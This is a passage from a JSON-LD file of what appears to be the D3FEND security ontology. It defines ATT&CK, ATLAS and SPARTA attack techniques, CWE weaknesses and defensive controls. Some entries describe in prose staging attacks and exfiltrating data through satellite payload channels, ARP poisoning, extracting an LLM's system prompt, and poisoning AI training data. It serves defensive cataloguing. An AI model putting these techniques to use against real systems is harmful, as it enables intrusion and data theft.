      "@id": "_:N7f121f2bc4e0400abc752409e01edca0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AllocateMemory"
      }
    },
    {
      "@id": "d3f:T1019",
      "@type": "owl:Class",
      "d3f:attack-id": "T1019",
      "d3f:definition": "The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1542.001",
      "rdfs:label": "System Firmware",
      "rdfs:seeAlso": {
        "@id": "d3f:T1542.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:NetworkAudioStreamingResource",
      "@type": "owl:Class",
      "d3f:definition": "A server that provides digital audio media content to users.",
      "rdfs:label": "Network Audio Streaming Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkMediaStreamingResource"
      }
    },
    {
      "@id": "d3f:T1593.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1593.001",
      "d3f:definition": "Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.",
      "rdfs:label": "Social Media",
      "rdfs:subClassOf": {
        "@id": "d3f:T1593"
      }
    },
    {
      "@id": "d3f:T1422.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1422.001",
      "d3f:definition": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using `adb shell netstat` for Android.(Citation: adb_commands)",
      "rdfs:label": "Internet Connection Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1422"
      },
      "skos:prefLabel": "Internet Connection Discovery"
    },
    {
      "@id": "d3f:RD-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0004",
      "d3f:definition": "Before execution, adversaries prepare the ground, literally and figuratively. They upload tooling, exploits, procedures, and datasets to infrastructure they own or have compromised, wire up C2 and telemetry pipelines, and pre-configure RF/baseband chains and protocol stacks to match mission parameters. Staging often uses cloud object stores, VPS fleets, or CI/CD runners masquerading as benign automation; artifacts are containerized or signed with hijacked material to blend in. For RF operations, actors assemble demod/encode flowgraphs, precompute CRC/MAC fields and timetags, and script rate/size pacing to fit pass windows. For ground/cloud, they stage credentials, macros, and schedule templates that can push changes or exfiltrate data quickly during handovers or safing. Dry-runs on flatsats/HIL rigs validate timing and error paths; OPSEC measures (rotating domains, domain fronting, traffic mixers) reduce attribution.",
      "rdfs:label": "Stage Capabilities - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Stage Capabilities"
    },
    {
      "@id": "d3f:OTConnectionCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Establish a network connection with a device.",
      "rdfs:label": "OT Connection Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTNetworkManagementCommandEvent"
        },
        {
          "@id": "_:N1fd3af844b3f4c5c90766dcb14fcfc76"
        },
        {
          "@id": "_:N7fa6e3cb9cb8490ca4264eece3cbaf57"
        }
      ]
    },
    {
      "@id": "_:N1fd3af844b3f4c5c90766dcb14fcfc76",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "_:N7fa6e3cb9cb8490ca4264eece3cbaf57",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTConnectionCommand"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-3_10",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Malicious Code Protection | Malicious Code Analysis",
      "d3f:exactly": {
        "@id": "d3f:DynamicAnalysis"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "SI-3(10)"
    },
    {
      "@id": "d3f:CWE-481",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-481",
      "d3f:definition": "The code uses an operator for assignment when the intention was to perform a comparison.",
      "rdfs:label": "Assigning instead of Comparing",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-480"
      }
    },
    {
      "@id": "d3f:AML.T0069",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0069",
      "d3f:definition": "The adversary is trying to discover something about the large language model's (LLM) system information. This may be found in a configuration file containing the system instructions or extracted via interactions with the LLM. The desired information may include the full system prompt, special characters that have significance to the LLM or keywords indicating functionality available to the LLM. Information about how the LLM is instructed can be used by the adversary to understand the system's capabilities and to aid them in crafting malicious prompts.",
      "rdfs:label": "Discover LLM System Information - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0069"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover LLM System Information"
    },
    {
      "@id": "d3f:ATTACKICSDiscoveryTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0102"
      },
      "rdfs:label": "Discovery Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:N5476ecdcbd384347a0914c929ef073b7"
        }
      ],
      "skos:prefLabel": "Discovery Technique"
    },
    {
      "@id": "_:N5476ecdcbd384347a0914c929ef073b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0102"
      }
    },
    {
      "@id": "d3f:SoftwareTimer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A timer implemented in software, typically managed by the operating system or application code. Software timers rely on underlying hardware timers or clocks to measure intervals and trigger actions. They are used for scheduling tasks, implementing timeouts, and managing periodic operations within software environments.",
      "d3f:implemented-by": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Software Timer",
      "rdfs:seeAlso": {
        "@id": "https://docs.aws.amazon.com/freertos/latest/userguide/software-timers.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Timer"
        },
        {
          "@id": "_:N6f49eb871f89458cbb0f9ceccd8d66ba"
        }
      ]
    },
    {
      "@id": "_:N6f49eb871f89458cbb0f9ceccd8d66ba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implemented-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:WindowsNtSuspendProcess",
      "@type": "owl:Class",
      "rdfs:label": "Windows NtSuspendProcess",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISuspendProcess"
      }
    },
    {
      "@id": "d3f:Reference-DHS-CCTV-Technology-Handbook",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.dhs.gov/sites/default/files/publications/CCTV-Tech-HBK_0713-508.pdf"
      },
      "d3f:kb-abstract": "A publicly available handbook describing CCTV technologies, components, and considerations for deployment.",
      "d3f:kb-author": "U.S. Department of Homeland Security",
      "d3f:kb-reference-of": {
        "@id": "d3f:VideoSurveillance"
      },
      "d3f:kb-reference-title": "CCTV Technology Handbook",
      "rdfs:label": "Reference - DHS CCTV Technology Handbook"
    },
    {
      "@id": "d3f:UnsupervisedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-UL",
      "d3f:definition": "Unsupervised learning creates relationships with unlabeled data without the input of a human or other outside actor. Uses only input data. ",
      "d3f:kb-abstract": "## References\nUnsupervised learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Unsupervised_learning).",
      "rdfs:label": "Unsupervised Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:CWE-553",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-553",
      "d3f:definition": "A possible shell file exists in /cgi-bin/ or other accessible directories. This is extremely dangerous and can be used by an attacker to execute commands on the web server.",
      "rdfs:label": "Command Shell in Externally Accessible Directory",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:manages",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x manages y: The technique or agent x watches and directs the use of digital artifact y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02447914-v"
      },
      "rdfs:label": "manages",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      },
      "skos:altLabel": [
        "oversees",
        "supervises"
      ]
    },
    {
      "@id": "d3f:CWE-1230",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1230",
      "d3f:definition": "The product prevents direct access to a resource containing sensitive information, but it does not sufficiently limit access to metadata that is derived from the original, sensitive information.",
      "rdfs:label": "Exposure of Sensitive Information Through Metadata",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:AML.T0010.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0010.002",
      "d3f:definition": "Data is a key vector of supply chain compromise for adversaries.\nEvery AI project will require some form of data.\nMany rely on large open source datasets that are publicly available.\nAn adversary could rely on compromising these sources of data.\nThe malicious data could be a result of [Poison Training Data](/techniques/AML.T0020) or include traditional malware.\n\nAn adversary can also target private datasets in the labeling phase.\nThe creation of private datasets will often require the hiring of outside labeling services.\nAn adversary can poison a dataset by modifying the labels being generated by the labeling service.",
      "rdfs:label": "Data - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0010.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0010"
      },
      "skos:prefLabel": "Data"
    },
    {
      "@id": "d3f:OTDeviceConfigurationCommand",
      "@type": "owl:Class",
      "d3f:definition": "Configure or administer managed devices.",
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: READ PROGRAM MEMORY\nGE-SRTP: WRITE PROGRAM BLOCK MEMORY\nGE-SRTP: CHANGE PLC CPU PRIVILEGE LEVEL\nGE-SRTP: SET CONTROL ID(CPU ID)\nGE-SRTP: SET PLC (RUN VS STOP)\nGE-SRTP: PROGRAM STORE (UPLOAD FROM PLC)\nGE-SRTP: PROGRAM LOAD (DOWNLOAD TO PLC)\nGE-SRTP: TOGGLE FORCE SYSTEM MEMORY"
      ],
      "rdfs:label": "OT Device Configuration Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceManagementMessage"
      }
    },
    {
      "@id": "d3f:Reference-FirmwareEmbeddedMonitoringCodeRedBalloon",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10657262B1/en"
      },
      "d3f:kb-abstract": "Systems and methods for securing embedded devices via both online and offline defensive strategies. One or more security software components may be injected into firmware binary to create a modified firmware binary, which is functionally- and size-equivalent to the original firmware binary. The security software components may retrieve live forensic information related to embedded devices for use in live hardening of the modified firmware binary while the embedded device is online, dynamically patching the firmware",
      "d3f:kb-author": "Ang Cui, Salvatore J. Stolfo",
      "d3f:kb-organization": "Red Balloon Security, Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareEmbeddedMonitoringCode"
      },
      "d3f:kb-reference-title": "Method and apparatus for securing embedded device firmware",
      "rdfs:label": "Reference - Firmware Embedded Monitoring Code Red Balloon"
    },
    {
      "@id": "d3f:InstantMessagingClient",
      "@type": "owl:Class",
      "d3f:definition": "Client software used to engage in Instant Messaging, a type of online chat that offers real-time text transmission over the Internet. A LAN messenger operates in a similar way over a local area network. Short messages are typically transmitted between two parties, when each user chooses to complete a thought and select \"send\". Some IM applications can use push technology to provide real-time text, which transmits messages character by character, as they are composed. More advanced instant messaging can add file transfer, clickable hyperlinks, Voice over IP, or video chat.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/wiki/Instant_messaging"
      },
      "rdfs:label": "Instant Messaging Client",
      "rdfs:subClassOf": {
        "@id": "d3f:CollaborativeSoftware"
      }
    },
    {
      "@id": "d3f:CCI-001083_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents the presentation of information system management-related functionality at an interface for non-privileged users.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001083"
    },
    {
      "@id": "d3f:CWE-352",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-352",
      "d3f:definition": "The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.",
      "d3f:synonym": [
        "CSRF",
        "Cross Site Reference Forgery",
        "Session Riding",
        "XSRF"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Cross-Site Request Forgery (CSRF)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-345"
        },
        {
          "@id": "_:N928153bd137646f3bd58c9c03b89ea5a"
        }
      ]
    },
    {
      "@id": "_:N928153bd137646f3bd58c9c03b89ea5a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:DeepQ-learning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DQL",
      "d3f:definition": "Uses a deep convolutional neural network, with layers of tiled convolutional filters to mimic the effects of receptive fields.",
      "d3f:kb-article": "## References\nQ-learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Q-learning#Deep_Q-learning).",
      "rdfs:label": "Deep Q-learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Q-Learning"
      }
    },
    {
      "@id": "d3f:PackageURL",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A package URL, or purl, is a URL used to identify a software package in a mostly universal and uniform way across programming languages, package managers, packaging conventions, tools, APIs and databases.",
      "d3f:identifies": {
        "@id": "d3f:SoftwarePackage"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://github.com/package-url/purl-spec/blob/main/PURL-SPECIFICATION.rst"
      },
      "rdfs:label": "Package URL",
      "rdfs:seeAlso": {
        "@id": "https://github.com/package-url/purl-spec"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:URL"
        },
        {
          "@id": "_:N1ab3b0ddbc594a2086b1786662d6cb40"
        }
      ],
      "skos:altLabel": "purl"
    },
    {
      "@id": "_:N1ab3b0ddbc594a2086b1786662d6cb40",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwarePackage"
      }
    },
    {
      "@id": "d3f:attack-id",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x attack-id y: The offensive technique x has the att&ck unique id of y.",
      "rdfs:domain": {
        "@id": "d3f:OffensiveTechnique"
      },
      "rdfs:label": "attack-id",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:attack-kb-annotation"
      }
    },
    {
      "@id": "d3f:RecurrentNeuralNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-RNN",
      "d3f:definition": "Recurrent Nerual Networks (RNN) are a class of artificial neural networks where connections between nodes can create a cycle, allowing output from some nodes to affect subsequent input to the same nodes. This allows it to exhibit temporal dynamic behavior.",
      "d3f:kb-article": "## References\nWikipedia. (2021, September 7). Recurrent Neural Network. [Link](https://en.wikipedia.org/wiki/Recurrent_neural_network)",
      "rdfs:label": "Recurrent Neural Network",
      "rdfs:subClassOf": {
        "@id": "d3f:DeepNeuralNetClassification"
      }
    },
    {
      "@id": "d3f:CWE-1426",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1426",
      "d3f:definition": "The product invokes a generative AI/ML component whose behaviors and outputs cannot be directly controlled, but the product does not validate or insufficiently validates the outputs to ensure that they align with the intended security, content, or privacy policy.",
      "rdfs:label": "Improper Validation of Generative AI Output",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:DNSTrafficAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DNSTrafficAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      },
      "d3f:d3fend-id": "D3-DNSTA",
      "d3f:definition": "Analysis of domain name metadata, including name and DNS records, to determine whether the domain is likely to resolve to an undesirable host.",
      "d3f:kb-article": "## How it works\nThis technique can be accomplished in a number of ways.\n\n* One example analytic determines whether or not a domain name was generated with an algorithm. Domain generation algorithms (DGAs) are sometimes used to create a domain name automatically  that will resolve to C2 infrastructure, without directly coding the domains in question into the malicious code.\n* Another method analyzes information about domains that have been visited, including whether a domain name is longer than a common length,  if a dynamic DNS domain was visited, if a fast-flux domain was visited, and if a recently created domain was visited. These factors are used to develop a score and if that score is over a certain threshold, an alert is generated.\n* Collected malware samples can be executed in a virtual environment to identify network domains that are connected to during execution. The network domains are then generated into signatures to identity bad domains for other hosts.\n\nThis technique does not check for content hosted at the domain.\n\n## Considerations\n\n* DNS produces a large amount of traffic which can be resource-intensive to analyze in real time.\n* If a server is compromised, for example, as part of a watering hole attack, but the DNS information pointing to that server is not altered, this technique would not catch such an incident.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DomainAgeRegistrationAlert_IncRapid7IncRAPID7Inc"
        },
        {
          "@id": "d3f:Reference-HeuristicBotnetDetection_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-MethodAndSystemForDetectingAlgorithm-generatedDomains_VECTRANETWORKSInc"
        },
        {
          "@id": "d3f:Reference-PredictingDomainGenerationAlgorithmsWithLongShort-TermMemoryNetworks_"
        },
        {
          "@id": "d3f:Reference-SinkholingBadNetworkDomainsByRegisteringTheBadNetworkDomainsOnTheInternet_PaloAltoNetworksInc"
        }
      ],
      "d3f:may-contain": {
        "@id": "d3f:DNSLookup"
      },
      "d3f:synonym": "Domain Name Analysis",
      "rdfs:label": "DNS Traffic Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N0b86ccfd50f243c78cab5d28b6331055"
        },
        {
          "@id": "_:Nd9eaea0b20794744b7f3959e839a53c2"
        }
      ]
    },
    {
      "@id": "_:N0b86ccfd50f243c78cab5d28b6331055",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      }
    },
    {
      "@id": "_:Nd9eaea0b20794744b7f3959e839a53c2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DNSLookup"
      }
    },
    {
      "@id": "d3f:UserProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user process is a process running to perform functions in the name of on particular user and user account, such as run an application or application service serving any number users.  This is in contrast to a system process, which executes software to fulfill operating system functions.",
      "rdfs:label": "User Process",
      "rdfs:subClassOf": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:CWE-1096",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1096",
      "d3f:definition": "The product implements a Singleton design pattern but does not use appropriate locking or other synchronization mechanism to ensure that the singleton class is only instantiated once.",
      "rdfs:label": "Singleton Class Instance Creation without Proper Locking or Synchronization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-820"
      }
    },
    {
      "@id": "d3f:CWE-154",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-154",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as variable name delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Variable Name Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:Higher-orderLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HOL",
      "d3f:definition": "Higher-order logic is a form of predicate logic that is distinguished from first-order logic by additional quantifiers and, sometimes, stronger semantics. Higher-order logics with their standard semantics are more expressive, but their model-theoretic properties are less well-behaved than those of first-order logic.",
      "d3f:kb-article": "## References\n1. Higher-order logic. (2023, May 13). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Higher-order_logic)",
      "d3f:synonym": "HOL",
      "rdfs:label": "Higher-order Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:PredicateLogic"
      }
    },
    {
      "@id": "d3f:PatternMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PM",
      "d3f:definition": "Pattern matching is the act of checking a given sequence of tokens for the presence of the constituents of some pattern.",
      "d3f:kb-article": "## References\n1. Pattern matching. (2023, May 20). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Pattern_matching)",
      "rdfs:label": "Pattern Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalRules"
      }
    },
    {
      "@id": "d3f:T1557.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1557.002",
      "d3f:definition": "Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).",
      "rdfs:label": "ARP Cache Poisoning",
      "rdfs:subClassOf": {
        "@id": "d3f:T1557"
      }
    },
    {
      "@id": "d3f:Reference-SystemsAndMethodsForDetectingCredentialTheft_SymantecCorp",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10162962B1"
      },
      "d3f:kb-abstract": "The disclosed computer-implemented method for detecting credential theft may include (i) monitoring a secured computing system's credential store that may include at least one sensitive credential that may be used to facilitate authentication of a user that is attempting to access the secured computing system, (ii) gathering, while monitoring the credential store, primary evidence of an attempted theft of the sensitive credential from the credential store, (iii) gathering corroborating evidence of the attempted theft of the sensitive credential, and (iv) performing a security action in response to gathering the primary evidence and the corroborating evidence of the attempted theft. The primary evidence of the attempted theft of the sensitive credential may include evidence of any suspicious access of the sensitive credential from the credential store that occurs outside of a procedure of authenticating the user. Various other methods, systems, and computer-readable media are also disclosed.",
      "d3f:kb-author": "Adam Glick; Brian Schlatter; Feng Li; Akshata Krishnamoorthy Rao",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Symantec Corp",
      "d3f:kb-reference-of": {
        "@id": "d3f:CredentialCompromiseScopeAnalysis"
      },
      "d3f:kb-reference-title": "Systems and methods for detecting credential theft",
      "rdfs:label": "Reference - Systems and methods for detecting credential theft - Symantec Corp"
    },
    {
      "@id": "d3f:T1580",
      "@type": "owl:Class",
      "d3f:attack-id": "T1580",
      "d3f:definition": "An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.",
      "rdfs:label": "Cloud Infrastructure Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:SupportVectorMachineClassification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SVMC",
      "d3f:definition": "Support Vector Machine (SVM) is a robust classification and regression technique that maximizes the predictive accuracy of a model without overfitting the training data. SVM is particularly suited to analyzing data with very large numbers (for example, thousands) of predictor fields.",
      "d3f:kb-article": "## References\nAbout Support Vector Machine (SVM). IBM SPSS Modeler SaaS Documentation. [Link](https://www.ibm.com/docs/en/spss-modeler/saas?topic=models-about-svm&mhsrc=ibmsearch_a&mhq=support%20vector%20machine).",
      "rdfs:label": "Support Vector Machine Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:Classification"
      }
    },
    {
      "@id": "d3f:EXF-0010",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0010",
      "d3f:definition": "Many payloads maintain communications separate from the primary TT&C, direct downlinks to user terminals, customer networks, or experimenter VPNs. An adversary who implants code in the payload (or controls its gateway) can route host-bus data into these channels, embed content within payload products (e.g., steganographic fields in imagery/telemetry), or schedule covert file transfers alongside legitimate deliveries. Because these paths are expected to carry high-rate mission data and may bypass TT&C monitoring, they provide a discreet conduit to exfiltrate payload or broader spacecraft information without altering the primary command link’s profile.",
      "rdfs:label": "Payload Communication Channel - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0010/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Payload Communication Channel"
    },
    {
      "@id": "d3f:T1078.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1078.003",
      "d3f:definition": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.",
      "d3f:uses": {
        "@id": "d3f:LocalUserAccount"
      },
      "rdfs:label": "Local Accounts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1078"
        },
        {
          "@id": "_:N92e50e35af7f41038c4e009c3acd4f75"
        }
      ]
    },
    {
      "@id": "_:N92e50e35af7f41038c4e009c3acd4f75",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:ATLASLateralMovementTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0015"
      },
      "rdfs:label": "Lateral Movement Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N6fe9c76cd209422bba4d5694377e3e08"
        }
      ],
      "skos:prefLabel": "Lateral Movement Technique"
    },
    {
      "@id": "_:N6fe9c76cd209422bba4d5694377e3e08",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0015"
      }
    },
    {
      "@id": "d3f:IA-0004.01",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0004.01",
      "d3f:definition": "Threat actors may target the backup ground segment, standby MOC sites, alternate commercial stations, or contingency chains held in reserve. Threat actors establish presence on the backup path (operator accounts, scheduler/orchestration, modem profiles, antenna control) and then exploit moments when operations shift: planned exercises, maintenance at the primary site, weather diversions, or failover during anomalies. They may also shape conditions so traffic is re-routed, e.g., by saturating the primary’s RF front end or consuming its schedules, without revealing their involvement. Once on the backup, prepositioned procedures, macros, or configuration sets allow command injection, manipulation of pass timelines, or quiet collection of downlink telemetry.",
      "rdfs:label": "Ground Station - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0004/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0004"
      },
      "skos:prefLabel": "Ground Station"
    },
    {
      "@id": "d3f:BERT",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BER",
      "d3f:definition": "Bidirectional Encoder Representations from Transformers (BERT) is based on a deep learning model in which every output element is connected to every input element, and the weightings between them are dynamically calculated based upon their connection.",
      "d3f:kb-article": "## References\nBERT (language model). (n.d.). In TechTarget. [Link](https://www.techtarget.com/searchenterpriseai/definition/BERT-language-model)\nBERT (language model). (n.d.). In Wikipedia. [Link](https://en.wikipedia.org/wiki/BERT_(language_model))",
      "d3f:synonym": "Bidirectional Encoder Representations from Transformers",
      "rdfs:label": "BERT",
      "rdfs:subClassOf": {
        "@id": "d3f:Transformer-basedLearning"
      }
    },
    {
      "@id": "d3f:HeapSegment",
      "@type": "owl:Class",
